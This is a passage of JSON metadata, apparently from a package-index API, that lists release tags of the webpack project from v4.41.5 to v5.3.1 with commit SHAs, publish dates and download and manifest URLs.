.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c